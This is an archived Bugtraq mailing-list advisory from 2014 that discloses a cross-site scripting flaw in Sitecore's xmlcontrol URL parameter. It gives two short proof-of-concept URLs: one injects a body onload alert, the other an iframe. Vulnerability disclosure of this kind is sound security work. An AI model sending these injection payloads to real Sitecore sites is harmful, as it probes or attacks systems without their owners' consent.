lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <52E8A977.9030406@securatary.com> Date: Tue, 28 Jan 2014 23:10:47 -0800 From: Mark Litchfield <mark@...uratary.com> To: bugtraq@...urityfocus.com Subject: SiteCore XML Control Script Insertion Hey All, Sitecores “special way” of displaying XML Controls directly allows for a Cross Site Scripting Attack – more can be achieved with these XML Controls and will be documented in another vulnerability report http://target/?xmlcontrol=body%20onload=alert(123) http://target/?xmlcontrol=iframe%20src=https://www.google.com/images/srpr/logo11w.png More information can be found at http://www.securatary.com/vulnerabilities - Also listed is a useful text file for use with Burp when auditing SiteCore.